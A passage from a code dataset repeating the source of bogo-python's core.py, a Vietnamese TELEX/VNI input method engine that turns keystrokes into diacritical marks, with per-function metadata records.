logging.debug("== In _transform(%s, %s) ==", comps, trans)
components = list(comps)
action, parameter = _get_action(trans)
if action == _Action.ADD_MARK and \
components[2] == "" and \
mark.strip(components[1]).lower() in ['oe', 'oa'] and trans == "o^":
action, parameter = _Action.ADD_CHAR, trans[0]
if action == _Action.ADD_ACCENT:
logging.debug("add_accent(%s, %s)", components, parameter)
components = accent.add_accent(components, parameter)
elif action == _Action.ADD_MARK and mark.is_valid_mark(components, trans):
logging.debug("add_mark(%s, %s)", components, parameter)
components = mark.add_mark(components, parameter)
# Handle uơ in "huơ", "thuở", "quở"
# If the current word has no last consonant and the first consonant
# is one of "h", "th" and the vowel is "ươ" then change the vowel into
# "uơ", keeping case and accent. If an alphabet character is then added
# into the word then change back to "ươ".
#
# NOTE: In the dictionary, these are the only words having this strange
# vowel so we don't need to worry about other cases.
if accent.remove_accent_string(components[1]).lower() == "ươ" and \
not components[2] and components[0].lower() in ["", "h", "th", "kh"]:
# Backup accents
ac = accent.get_accent_string(components[1])
components[1] = ("u", "U")[components[1][0].isupper()] + components[1][1]
components = accent.add_accent(components, ac)
elif action == _Action.ADD_CHAR:
if trans[0] == "<":
if not components[2]:
# Only allow ư, ơ or ươ sitting alone in the middle part
# and ['g', 'i', '']. If we want to type giowf = 'giờ', separate()
# will create ['g', 'i', '']. Therefore we have to allow
# components[1] == 'i'.
if (components[0].lower(), components[1].lower()) == ('g', 'i'):
components[0] += components[1]
components[1] = ''
if not components[1] or \
(components[1].lower(), trans[1].lower()) == ('ư', 'ơ'):
components[1] += trans[1]
else:
components = utils.append_comps(components, parameter)
if parameter.isalpha() and \
accent.remove_accent_string(components[1]).lower().startswith("uơ"):
ac = accent.get_accent_string(components[1])
components[1] = ('ư', 'Ư')[components[1][0].isupper()] + \
('ơ', 'Ơ')[components[1][1].isupper()] + components[1][2:]
components = accent.add_accent(components, ac)
elif action == _Action.UNDO:
components = _reverse(components, trans[1:])
if action == _Action.ADD_MARK or (action == _Action.ADD_CHAR and parameter.isalpha()):
# If there is any accent, remove and reapply it
# because it is likely to be misplaced in previous transformations
ac = accent.get_accent_string(components[1])
if ac != accent.Accent.NONE:
components = accent.add_accent(components, Accent.NONE)
components = accent.add_accent(components, ac)
logging.debug("After transform: %s", components)
return components
def _reverse(components, trans):
"""
Reverse the effect of transformation 'trans' on 'components'
If the transformation does not affect the components, return the original
string.
"""
action, parameter = _get_action(trans)
comps = list(components)
string = utils.join(comps)
if action == _Action.ADD_CHAR and string[-1].lower() == parameter.lower():
if comps[2]:
i = 2
elif comps[1]:
i = 1
else:
i = 0
comps[i] = comps[i][:-1]
elif action == _Action.ADD_ACCENT:
comps = accent.add_accent(comps, Accent.NONE)
elif action == _Action.ADD_MARK:
if parameter == Mark.BAR:
comps[0] = comps[0][:-1] + \
mark.add_mark_char(comps[0][-1:], Mark.NONE)
else:
if mark.is_valid_mark(comps, trans):
comps[1] = "".join([mark.add_mark_char(c, Mark.NONE)
for c in comps[1]])
return comps
def _can_undo(comps, trans_list):
"""
Return whether a components can be undone with one of the transformation in
trans_list.
"""
comps = list(comps)
accent_list = list(map(accent.get_accent_char, comps[1]))
mark_list = list(map(mark.get_mark_char, utils.join(comps)))
action_list = list(map(lambda x: _get_action(x), trans_list))
def atomic_check(action):
"""
Check if the `action` created one of the marks, accents, or characters
in `comps`.
"""
return (action[0] == _Action.ADD_ACCENT and action[1] in accent_list) \
or (action[0] == _Action.ADD_MARK and action[1] in mark_list) \
or (action[0] == _Action.ADD_CHAR and action[1] == \
accent.remove_accent_char(comps[1][-1])) # ơ, ư
return any(map(atomic_check, action_list))
def handle_backspace(converted_string, raw_sequence, im_rules=None):
"""
Returns a new raw_sequence after a backspace. This raw_sequence should
be pushed back to process_sequence().
"""
# I can't find a simple explanation for this, so
# I hope this example can help clarify it:
#
# handle_backspace(thương, thuwongw) -> thuwonw
# handle_backspace(thươn, thuwonw) -> thuwow
# handle_backspace(thươ, thuwow) -> thuw
# handle_backspace(thươ, thuw) -> th
#
# The algorithm for handle_backspace was contributed by @hainp.
if im_rules == None:
im_rules = get_telex_definition()
deleted_char = converted_string[-1]
_accent = accent.get_accent_char(deleted_char)
_mark = mark.get_mark_char(deleted_char)
if _mark or _accent:
# Find a sequence of IM keys at the end of
# raw_sequence
ime_keys_at_end = ""
len_raw_sequence = len(raw_sequence)
i = len_raw_sequence - 1
while i >= 0:
if raw_sequence[i] not in im_rules and \
raw_sequence[i] not in "aeiouyd":
i += 1
break
else:
ime_keys_at_end = raw_sequence[i] + ime_keys_at_end
i -= 1
# Try to find a subsequence from that sequence
# that can be converted to the deleted_char
k = 0
while k < len_raw_sequence:
if process_sequence(raw_sequence[i + k:], im_rules) == deleted_char:
# Delete that subsequence
raw_sequence = raw_sequence[:i + k]
break
k += 1
else:
index = raw_sequence.rfind(deleted_char)
raw_sequence = raw_sequence[:index] + raw_sequence[(index + 1):]
return raw_sequence
|
BoGoEngine/bogo-python | bogo/core.py | _get_transformation_list | python | def _get_transformation_list(key, im, fallback_sequence):
# if key in im:
# lkey = key
# else:
# lkey = key.lower()
lkey = key.lower()
if lkey in im:
if isinstance(im[lkey], list):
trans_list = im[lkey]
else:
trans_list = [im[lkey]]
for i, trans in enumerate(trans_list):
if trans[0] == '<' and key.isalpha():
trans_list[i] = trans[0] + \
utils.change_case(trans[1], int(key.isupper()))
if trans_list == ['_']:
if len(fallback_sequence) >= 2:
# TODO Use takewhile()/dropwhile() to process the last IM keypress
# instead of assuming it's the last key in fallback_sequence.
t = list(map(lambda x: "_" + x,
_get_transformation_list(fallback_sequence[-2], im,
fallback_sequence[:-1])))
# print(t)
trans_list = t
# else:
# trans_list = ['+' + key]
return trans_list
else:
return ['+' + key] | Return the list of transformations inferred from the entered key. The
map between transform types and keys is given by module
bogo_config (if exists) or by variable simple_telex_im
if entered key is not in im, return "+key", meaning appending
the entered key to current text | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/core.py#L289-L329 | [
"def change_case(string, case):\n \"\"\"\n Helper: Return new string obtained from change the given string to\n desired case.\n\n Args\n string\n case - 0: lower, 1: upper\n \"\"\"\n return string.upper() if case else string.lower()\n",
"def _get_transformation_list(key, im, fallba... | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Read the docstring for process_sequence() and process_key() first.
"""
from __future__ import unicode_literals
from bogo.validation import is_valid_combination
from bogo import utils, accent, mark
import logging
import sys
import string
Mark = mark.Mark
Accent = accent.Accent
class _Action:
UNDO = 3
ADD_MARK = 2
ADD_ACCENT = 1
ADD_CHAR = 0
def get_telex_definition(w_shorthand=True, brackets_shorthand=True):
"""Create a definition dictionary for the TELEX input method
Args:
w_shorthand (optional): allow a stand-alone w to be
interpreted as an ư. Default to True.
brackets_shorthand (optional, True): allow typing ][ as
shorthand for ươ. Default to True.
Returns a dictionary to be passed into process_key().
"""
telex = {
"a": "a^",
"o": "o^",
"e": "e^",
"w": ["u*", "o*", "a+"],
"d": "d-",
"f": "\\",
"s": "/",
"r": "?",
"x": "~",
"j": ".",
}
if w_shorthand:
telex["w"].append('<ư')
if brackets_shorthand:
telex.update({
"]": "<ư",
"[": "<ơ",
"}": "<Ư",
"{": "<Ơ"
})
return telex
def get_vni_definition():
"""Create a definition dictionary for the VNI input method.
Returns a dictionary to be passed into process_key().
"""
return {
"6": ["a^", "o^", "e^"],
"7": ["u*", "o*"],
"8": "a+",
"9": "d-",
"2": "\\",
"1": "/",
"3": "?",
"4": "~",
"5": "."
}
def _accepted_chars(rules):
if sys.version_info[0] > 2:
ascii_letters = \
string.ascii_letters
else:
ascii_letters = \
string.lowercase + \
string.uppercase
return set(ascii_letters + ''.join(rules.keys()) + utils.VOWELS + "đ")
def process_sequence(sequence,
rules=None,
skip_non_vietnamese=True):
"""\
Convert a key sequence into a Vietnamese string with diacritical marks.
Args:
rules (optional): see docstring for process_key().
skip_non_vietnamese (optional): see docstring for process_key().
It even supports continous key sequences connected by separators.
i.e. process_sequence('con meof.ddieen') should work.
"""
result = ""
raw = result
result_parts = []
if rules is None:
rules = get_telex_definition()
accepted_chars = _accepted_chars(rules)
for key in sequence:
if key not in accepted_chars:
result_parts.append(result)
result_parts.append(key)
result = ""
raw = ""
else:
result, raw = process_key(
string=result,
key=key,
fallback_sequence=raw,
rules=rules,
skip_non_vietnamese=skip_non_vietnamese)
result_parts.append(result)
return ''.join(result_parts)
def process_key(string, key,
fallback_sequence="", rules=None,
skip_non_vietnamese=True):
"""Process a keystroke.
Args:
string: The previously processed string or "".
key: The keystroke.
fallback_sequence: The previous keystrokes.
rules (optional): A dictionary listing
transformation rules. Defaults to get_telex_definition().
skip_non_vietnamese (optional): Whether to skip results that
doesn't seem like Vietnamese. Defaults to True.
Returns a tuple. The first item of which is the processed
Vietnamese string, the second item is the next fallback sequence.
The two items are to be fed back into the next call of process_key()
as `string` and `fallback_sequence`. If `skip_non_vietnamese` is
True and the resulting string doesn't look like Vietnamese,
both items contain the `fallback_sequence`.
>>> process_key('a', 'a', 'a')
(â, aa)
Note that when a key is an undo key, it won't get appended to
`fallback_sequence`.
>>> process_key('â', 'a', 'aa')
(aa, aa)
`rules` is a dictionary that maps keystrokes to
their effect string. The effects can be one of the following:
'a^': a with circumflex (â), only affect an existing 'a family'
'a+': a with breve (ă), only affect an existing 'a family'
'e^': e with circumflex (ê), only affect an existing 'e family'
'o^': o with circumflex (ô), only affect an existing 'o family'
'o*': o with horn (ơ), only affect an existing 'o family'
'd-': d with bar (đ), only affect an existing 'd'
'/': acute (sắc), affect an existing vowel
'\': grave (huyền), affect an existing vowel
'?': hook (hỏi), affect an existing vowel
'~': tilde (ngã), affect an existing vowel
'.': dot (nặng), affect an existing vowel
'<ư': append ư
'<ơ': append ơ
A keystroke entry can have multiple effects, in which case the
dictionary entry's value should be a list of the possible
effect strings. Although you should try to avoid this if
you are defining a custom input method rule.
"""
# TODO Figure out a way to remove the `string` argument. Perhaps only the
# key sequence is needed?
def default_return():
return string + key, fallback_sequence + key
if rules is None:
rules = get_telex_definition()
comps = utils.separate(string)
# if not _is_processable(comps):
# return default_return()
# Find all possible transformations this keypress can generate
trans_list = _get_transformation_list(
key, rules, fallback_sequence)
# Then apply them one by one
new_comps = list(comps)
for trans in trans_list:
new_comps = _transform(new_comps, trans)
if new_comps == comps:
tmp = list(new_comps)
# If none of the transformations (if any) work
# then this keystroke is probably an undo key.
if _can_undo(new_comps, trans_list):
# The prefix "_" means undo.
for trans in map(lambda x: "_" + x, trans_list):
new_comps = _transform(new_comps, trans)
# Undoing the w key with the TELEX input method with the
# w:<ư extension requires some care.
#
# The input (ư, w) should be undone as w
# on the other hand, (ư, uw) should return uw.
#
# _transform() is not aware of the 2 ways to generate
# ư in TELEX and always think ư was created by uw.
# Therefore, after calling _transform() to undo ư,
# we always get ['', 'u', ''].
#
# So we have to clean it up a bit.
def is_telex_like():
return '<ư' in rules["w"]
def undone_vowel_ends_with_u():
return new_comps[1] and new_comps[1][-1].lower() == "u"
def not_first_key_press():
return len(fallback_sequence) >= 1
def user_typed_ww():
return (fallback_sequence[-1:]+key).lower() == "ww"
def user_didnt_type_uww():
return not (len(fallback_sequence) >= 2 and
fallback_sequence[-2].lower() == "u")
if is_telex_like() and \
not_first_key_press() and \
undone_vowel_ends_with_u() and \
user_typed_ww() and \
user_didnt_type_uww():
# The vowel part of new_comps is supposed to end with
# u now. That u should be removed.
new_comps[1] = new_comps[1][:-1]
if tmp == new_comps:
fallback_sequence += key
new_comps = utils.append_comps(new_comps, key)
else:
fallback_sequence += key
if skip_non_vietnamese is True and key.isalpha() and \
not is_valid_combination(new_comps, final_form=False):
result = fallback_sequence, fallback_sequence
else:
result = utils.join(new_comps), fallback_sequence
return result
def _get_action(trans):
"""
Return the action inferred from the transformation `trans`.
and the parameter going with this action
An _Action.ADD_MARK goes with a Mark
while an _Action.ADD_ACCENT goes with an Accent
"""
# TODO: VIQR-like convention
mark_action = {
'^': (_Action.ADD_MARK, Mark.HAT),
'+': (_Action.ADD_MARK, Mark.BREVE),
'*': (_Action.ADD_MARK, Mark.HORN),
'-': (_Action.ADD_MARK, Mark.BAR),
}
accent_action = {
'\\': (_Action.ADD_ACCENT, Accent.GRAVE),
'/': (_Action.ADD_ACCENT, Accent.ACUTE),
'?': (_Action.ADD_ACCENT, Accent.HOOK),
'~': (_Action.ADD_ACCENT, Accent.TIDLE),
'.': (_Action.ADD_ACCENT, Accent.DOT),
}
if trans[0] in ('<', '+'):
return _Action.ADD_CHAR, trans[1]
if trans[0] == "_":
return _Action.UNDO, trans[1:]
if len(trans) == 2:
return mark_action[trans[1]]
else:
return accent_action[trans[0]]
def _transform(comps, trans):
"""
Transform the given string with transform type trans
"""
logging.debug("== In _transform(%s, %s) ==", comps, trans)
components = list(comps)
action, parameter = _get_action(trans)
if action == _Action.ADD_MARK and \
components[2] == "" and \
mark.strip(components[1]).lower() in ['oe', 'oa'] and trans == "o^":
action, parameter = _Action.ADD_CHAR, trans[0]
if action == _Action.ADD_ACCENT:
logging.debug("add_accent(%s, %s)", components, parameter)
components = accent.add_accent(components, parameter)
elif action == _Action.ADD_MARK and mark.is_valid_mark(components, trans):
logging.debug("add_mark(%s, %s)", components, parameter)
components = mark.add_mark(components, parameter)
# Handle uơ in "huơ", "thuở", "quở"
# If the current word has no last consonant and the first consonant
# is one of "h", "th" and the vowel is "ươ" then change the vowel into
# "uơ", keeping case and accent. If an alphabet character is then added
# into the word then change back to "ươ".
#
# NOTE: In the dictionary, these are the only words having this strange
# vowel so we don't need to worry about other cases.
if accent.remove_accent_string(components[1]).lower() == "ươ" and \
not components[2] and components[0].lower() in ["", "h", "th", "kh"]:
# Backup accents
ac = accent.get_accent_string(components[1])
components[1] = ("u", "U")[components[1][0].isupper()] + components[1][1]
components = accent.add_accent(components, ac)
elif action == _Action.ADD_CHAR:
if trans[0] == "<":
if not components[2]:
# Only allow ư, ơ or ươ sitting alone in the middle part
# and ['g', 'i', '']. If we want to type giowf = 'giờ', separate()
# will create ['g', 'i', '']. Therefore we have to allow
# components[1] == 'i'.
if (components[0].lower(), components[1].lower()) == ('g', 'i'):
components[0] += components[1]
components[1] = ''
if not components[1] or \
(components[1].lower(), trans[1].lower()) == ('ư', 'ơ'):
components[1] += trans[1]
else:
components = utils.append_comps(components, parameter)
if parameter.isalpha() and \
accent.remove_accent_string(components[1]).lower().startswith("uơ"):
ac = accent.get_accent_string(components[1])
components[1] = ('ư', 'Ư')[components[1][0].isupper()] + \
('ơ', 'Ơ')[components[1][1].isupper()] + components[1][2:]
components = accent.add_accent(components, ac)
elif action == _Action.UNDO:
components = _reverse(components, trans[1:])
if action == _Action.ADD_MARK or (action == _Action.ADD_CHAR and parameter.isalpha()):
# If there is any accent, remove and reapply it
# because it is likely to be misplaced in previous transformations
ac = accent.get_accent_string(components[1])
if ac != accent.Accent.NONE:
components = accent.add_accent(components, Accent.NONE)
components = accent.add_accent(components, ac)
logging.debug("After transform: %s", components)
return components
def _reverse(components, trans):
"""
Reverse the effect of transformation 'trans' on 'components'
If the transformation does not affect the components, return the original
string.
"""
action, parameter = _get_action(trans)
comps = list(components)
string = utils.join(comps)
if action == _Action.ADD_CHAR and string[-1].lower() == parameter.lower():
if comps[2]:
i = 2
elif comps[1]:
i = 1
else:
i = 0
comps[i] = comps[i][:-1]
elif action == _Action.ADD_ACCENT:
comps = accent.add_accent(comps, Accent.NONE)
elif action == _Action.ADD_MARK:
if parameter == Mark.BAR:
comps[0] = comps[0][:-1] + \
mark.add_mark_char(comps[0][-1:], Mark.NONE)
else:
if mark.is_valid_mark(comps, trans):
comps[1] = "".join([mark.add_mark_char(c, Mark.NONE)
for c in comps[1]])
return comps
def _can_undo(comps, trans_list):
"""
Return whether a components can be undone with one of the transformation in
trans_list.
"""
comps = list(comps)
accent_list = list(map(accent.get_accent_char, comps[1]))
mark_list = list(map(mark.get_mark_char, utils.join(comps)))
action_list = list(map(lambda x: _get_action(x), trans_list))
def atomic_check(action):
"""
Check if the `action` created one of the marks, accents, or characters
in `comps`.
"""
return (action[0] == _Action.ADD_ACCENT and action[1] in accent_list) \
or (action[0] == _Action.ADD_MARK and action[1] in mark_list) \
or (action[0] == _Action.ADD_CHAR and action[1] == \
accent.remove_accent_char(comps[1][-1])) # ơ, ư
return any(map(atomic_check, action_list))
def handle_backspace(converted_string, raw_sequence, im_rules=None):
"""
Returns a new raw_sequence after a backspace. This raw_sequence should
be pushed back to process_sequence().
"""
# I can't find a simple explanation for this, so
# I hope this example can help clarify it:
#
# handle_backspace(thương, thuwongw) -> thuwonw
# handle_backspace(thươn, thuwonw) -> thuwow
# handle_backspace(thươ, thuwow) -> thuw
# handle_backspace(thươ, thuw) -> th
#
# The algorithm for handle_backspace was contributed by @hainp.
if im_rules == None:
im_rules = get_telex_definition()
deleted_char = converted_string[-1]
_accent = accent.get_accent_char(deleted_char)
_mark = mark.get_mark_char(deleted_char)
if _mark or _accent:
# Find a sequence of IM keys at the end of
# raw_sequence
ime_keys_at_end = ""
len_raw_sequence = len(raw_sequence)
i = len_raw_sequence - 1
while i >= 0:
if raw_sequence[i] not in im_rules and \
raw_sequence[i] not in "aeiouyd":
i += 1
break
else:
ime_keys_at_end = raw_sequence[i] + ime_keys_at_end
i -= 1
# Try to find a subsequence from that sequence
# that can be converted to the deleted_char
k = 0
while k < len_raw_sequence:
if process_sequence(raw_sequence[i + k:], im_rules) == deleted_char:
# Delete that subsequence
raw_sequence = raw_sequence[:i + k]
break
k += 1
else:
index = raw_sequence.rfind(deleted_char)
raw_sequence = raw_sequence[:index] + raw_sequence[(index + 1):]
return raw_sequence
|
BoGoEngine/bogo-python | bogo/core.py | _get_action | python | def _get_action(trans):
# TODO: VIQR-like convention
mark_action = {
'^': (_Action.ADD_MARK, Mark.HAT),
'+': (_Action.ADD_MARK, Mark.BREVE),
'*': (_Action.ADD_MARK, Mark.HORN),
'-': (_Action.ADD_MARK, Mark.BAR),
}
accent_action = {
'\\': (_Action.ADD_ACCENT, Accent.GRAVE),
'/': (_Action.ADD_ACCENT, Accent.ACUTE),
'?': (_Action.ADD_ACCENT, Accent.HOOK),
'~': (_Action.ADD_ACCENT, Accent.TIDLE),
'.': (_Action.ADD_ACCENT, Accent.DOT),
}
if trans[0] in ('<', '+'):
return _Action.ADD_CHAR, trans[1]
if trans[0] == "_":
return _Action.UNDO, trans[1:]
if len(trans) == 2:
return mark_action[trans[1]]
else:
return accent_action[trans[0]] | Return the action inferred from the transformation `trans`.
and the parameter going with this action
An _Action.ADD_MARK goes with a Mark
while an _Action.ADD_ACCENT goes with an Accent | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/core.py#L332-L362 | null | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Read the docstring for process_sequence() and process_key() first.
"""
from __future__ import unicode_literals
from bogo.validation import is_valid_combination
from bogo import utils, accent, mark
import logging
import sys
import string
Mark = mark.Mark
Accent = accent.Accent
class _Action:
UNDO = 3
ADD_MARK = 2
ADD_ACCENT = 1
ADD_CHAR = 0
def get_telex_definition(w_shorthand=True, brackets_shorthand=True):
"""Create a definition dictionary for the TELEX input method
Args:
w_shorthand (optional): allow a stand-alone w to be
interpreted as an ư. Default to True.
brackets_shorthand (optional, True): allow typing ][ as
shorthand for ươ. Default to True.
Returns a dictionary to be passed into process_key().
"""
telex = {
"a": "a^",
"o": "o^",
"e": "e^",
"w": ["u*", "o*", "a+"],
"d": "d-",
"f": "\\",
"s": "/",
"r": "?",
"x": "~",
"j": ".",
}
if w_shorthand:
telex["w"].append('<ư')
if brackets_shorthand:
telex.update({
"]": "<ư",
"[": "<ơ",
"}": "<Ư",
"{": "<Ơ"
})
return telex
def get_vni_definition():
"""Create a definition dictionary for the VNI input method.
Returns a dictionary to be passed into process_key().
"""
return {
"6": ["a^", "o^", "e^"],
"7": ["u*", "o*"],
"8": "a+",
"9": "d-",
"2": "\\",
"1": "/",
"3": "?",
"4": "~",
"5": "."
}
def _accepted_chars(rules):
if sys.version_info[0] > 2:
ascii_letters = \
string.ascii_letters
else:
ascii_letters = \
string.lowercase + \
string.uppercase
return set(ascii_letters + ''.join(rules.keys()) + utils.VOWELS + "đ")
def process_sequence(sequence,
rules=None,
skip_non_vietnamese=True):
"""\
Convert a key sequence into a Vietnamese string with diacritical marks.
Args:
rules (optional): see docstring for process_key().
skip_non_vietnamese (optional): see docstring for process_key().
It even supports continous key sequences connected by separators.
i.e. process_sequence('con meof.ddieen') should work.
"""
result = ""
raw = result
result_parts = []
if rules is None:
rules = get_telex_definition()
accepted_chars = _accepted_chars(rules)
for key in sequence:
if key not in accepted_chars:
result_parts.append(result)
result_parts.append(key)
result = ""
raw = ""
else:
result, raw = process_key(
string=result,
key=key,
fallback_sequence=raw,
rules=rules,
skip_non_vietnamese=skip_non_vietnamese)
result_parts.append(result)
return ''.join(result_parts)
def process_key(string, key,
fallback_sequence="", rules=None,
skip_non_vietnamese=True):
"""Process a keystroke.
Args:
string: The previously processed string or "".
key: The keystroke.
fallback_sequence: The previous keystrokes.
rules (optional): A dictionary listing
transformation rules. Defaults to get_telex_definition().
skip_non_vietnamese (optional): Whether to skip results that
doesn't seem like Vietnamese. Defaults to True.
Returns a tuple. The first item of which is the processed
Vietnamese string, the second item is the next fallback sequence.
The two items are to be fed back into the next call of process_key()
as `string` and `fallback_sequence`. If `skip_non_vietnamese` is
True and the resulting string doesn't look like Vietnamese,
both items contain the `fallback_sequence`.
>>> process_key('a', 'a', 'a')
(â, aa)
Note that when a key is an undo key, it won't get appended to
`fallback_sequence`.
>>> process_key('â', 'a', 'aa')
(aa, aa)
`rules` is a dictionary that maps keystrokes to
their effect string. The effects can be one of the following:
'a^': a with circumflex (â), only affect an existing 'a family'
'a+': a with breve (ă), only affect an existing 'a family'
'e^': e with circumflex (ê), only affect an existing 'e family'
'o^': o with circumflex (ô), only affect an existing 'o family'
'o*': o with horn (ơ), only affect an existing 'o family'
'd-': d with bar (đ), only affect an existing 'd'
'/': acute (sắc), affect an existing vowel
'\': grave (huyền), affect an existing vowel
'?': hook (hỏi), affect an existing vowel
'~': tilde (ngã), affect an existing vowel
'.': dot (nặng), affect an existing vowel
'<ư': append ư
'<ơ': append ơ
A keystroke entry can have multiple effects, in which case the
dictionary entry's value should be a list of the possible
effect strings. Although you should try to avoid this if
you are defining a custom input method rule.
"""
# TODO Figure out a way to remove the `string` argument. Perhaps only the
# key sequence is needed?
def default_return():
return string + key, fallback_sequence + key
if rules is None:
rules = get_telex_definition()
comps = utils.separate(string)
# if not _is_processable(comps):
# return default_return()
# Find all possible transformations this keypress can generate
trans_list = _get_transformation_list(
key, rules, fallback_sequence)
# Then apply them one by one
new_comps = list(comps)
for trans in trans_list:
new_comps = _transform(new_comps, trans)
if new_comps == comps:
tmp = list(new_comps)
# If none of the transformations (if any) work
# then this keystroke is probably an undo key.
if _can_undo(new_comps, trans_list):
# The prefix "_" means undo.
for trans in map(lambda x: "_" + x, trans_list):
new_comps = _transform(new_comps, trans)
# Undoing the w key with the TELEX input method with the
# w:<ư extension requires some care.
#
# The input (ư, w) should be undone as w
# on the other hand, (ư, uw) should return uw.
#
# _transform() is not aware of the 2 ways to generate
# ư in TELEX and always think ư was created by uw.
# Therefore, after calling _transform() to undo ư,
# we always get ['', 'u', ''].
#
# So we have to clean it up a bit.
def is_telex_like():
return '<ư' in rules["w"]
def undone_vowel_ends_with_u():
return new_comps[1] and new_comps[1][-1].lower() == "u"
def not_first_key_press():
return len(fallback_sequence) >= 1
def user_typed_ww():
return (fallback_sequence[-1:]+key).lower() == "ww"
def user_didnt_type_uww():
return not (len(fallback_sequence) >= 2 and
fallback_sequence[-2].lower() == "u")
if is_telex_like() and \
not_first_key_press() and \
undone_vowel_ends_with_u() and \
user_typed_ww() and \
user_didnt_type_uww():
# The vowel part of new_comps is supposed to end with
# u now. That u should be removed.
new_comps[1] = new_comps[1][:-1]
if tmp == new_comps:
fallback_sequence += key
new_comps = utils.append_comps(new_comps, key)
else:
fallback_sequence += key
if skip_non_vietnamese is True and key.isalpha() and \
not is_valid_combination(new_comps, final_form=False):
result = fallback_sequence, fallback_sequence
else:
result = utils.join(new_comps), fallback_sequence
return result
def _get_transformation_list(key, im, fallback_sequence):
"""
Return the list of transformations inferred from the entered key. The
map between transform types and keys is given by module
bogo_config (if exists) or by variable simple_telex_im
if entered key is not in im, return "+key", meaning appending
the entered key to current text
"""
# if key in im:
# lkey = key
# else:
# lkey = key.lower()
lkey = key.lower()
if lkey in im:
if isinstance(im[lkey], list):
trans_list = im[lkey]
else:
trans_list = [im[lkey]]
for i, trans in enumerate(trans_list):
if trans[0] == '<' and key.isalpha():
trans_list[i] = trans[0] + \
utils.change_case(trans[1], int(key.isupper()))
if trans_list == ['_']:
if len(fallback_sequence) >= 2:
# TODO Use takewhile()/dropwhile() to process the last IM keypress
# instead of assuming it's the last key in fallback_sequence.
t = list(map(lambda x: "_" + x,
_get_transformation_list(fallback_sequence[-2], im,
fallback_sequence[:-1])))
# print(t)
trans_list = t
# else:
# trans_list = ['+' + key]
return trans_list
else:
return ['+' + key]
def _transform(comps, trans):
"""
Transform the given string with transform type trans
"""
logging.debug("== In _transform(%s, %s) ==", comps, trans)
components = list(comps)
action, parameter = _get_action(trans)
if action == _Action.ADD_MARK and \
components[2] == "" and \
mark.strip(components[1]).lower() in ['oe', 'oa'] and trans == "o^":
action, parameter = _Action.ADD_CHAR, trans[0]
if action == _Action.ADD_ACCENT:
logging.debug("add_accent(%s, %s)", components, parameter)
components = accent.add_accent(components, parameter)
elif action == _Action.ADD_MARK and mark.is_valid_mark(components, trans):
logging.debug("add_mark(%s, %s)", components, parameter)
components = mark.add_mark(components, parameter)
# Handle uơ in "huơ", "thuở", "quở"
# If the current word has no last consonant and the first consonant
# is one of "h", "th" and the vowel is "ươ" then change the vowel into
# "uơ", keeping case and accent. If an alphabet character is then added
# into the word then change back to "ươ".
#
# NOTE: In the dictionary, these are the only words having this strange
# vowel so we don't need to worry about other cases.
if accent.remove_accent_string(components[1]).lower() == "ươ" and \
not components[2] and components[0].lower() in ["", "h", "th", "kh"]:
# Backup accents
ac = accent.get_accent_string(components[1])
components[1] = ("u", "U")[components[1][0].isupper()] + components[1][1]
components = accent.add_accent(components, ac)
elif action == _Action.ADD_CHAR:
if trans[0] == "<":
if not components[2]:
# Only allow ư, ơ or ươ sitting alone in the middle part
# and ['g', 'i', '']. If we want to type giowf = 'giờ', separate()
# will create ['g', 'i', '']. Therefore we have to allow
# components[1] == 'i'.
if (components[0].lower(), components[1].lower()) == ('g', 'i'):
components[0] += components[1]
components[1] = ''
if not components[1] or \
(components[1].lower(), trans[1].lower()) == ('ư', 'ơ'):
components[1] += trans[1]
else:
components = utils.append_comps(components, parameter)
if parameter.isalpha() and \
accent.remove_accent_string(components[1]).lower().startswith("uơ"):
ac = accent.get_accent_string(components[1])
components[1] = ('ư', 'Ư')[components[1][0].isupper()] + \
('ơ', 'Ơ')[components[1][1].isupper()] + components[1][2:]
components = accent.add_accent(components, ac)
elif action == _Action.UNDO:
components = _reverse(components, trans[1:])
if action == _Action.ADD_MARK or (action == _Action.ADD_CHAR and parameter.isalpha()):
# If there is any accent, remove and reapply it
# because it is likely to be misplaced in previous transformations
ac = accent.get_accent_string(components[1])
if ac != accent.Accent.NONE:
components = accent.add_accent(components, Accent.NONE)
components = accent.add_accent(components, ac)
logging.debug("After transform: %s", components)
return components
def _reverse(components, trans):
"""
Reverse the effect of transformation 'trans' on 'components'
If the transformation does not affect the components, return the original
string.
"""
action, parameter = _get_action(trans)
comps = list(components)
string = utils.join(comps)
if action == _Action.ADD_CHAR and string[-1].lower() == parameter.lower():
if comps[2]:
i = 2
elif comps[1]:
i = 1
else:
i = 0
comps[i] = comps[i][:-1]
elif action == _Action.ADD_ACCENT:
comps = accent.add_accent(comps, Accent.NONE)
elif action == _Action.ADD_MARK:
if parameter == Mark.BAR:
comps[0] = comps[0][:-1] + \
mark.add_mark_char(comps[0][-1:], Mark.NONE)
else:
if mark.is_valid_mark(comps, trans):
comps[1] = "".join([mark.add_mark_char(c, Mark.NONE)
for c in comps[1]])
return comps
def _can_undo(comps, trans_list):
"""
Return whether a components can be undone with one of the transformation in
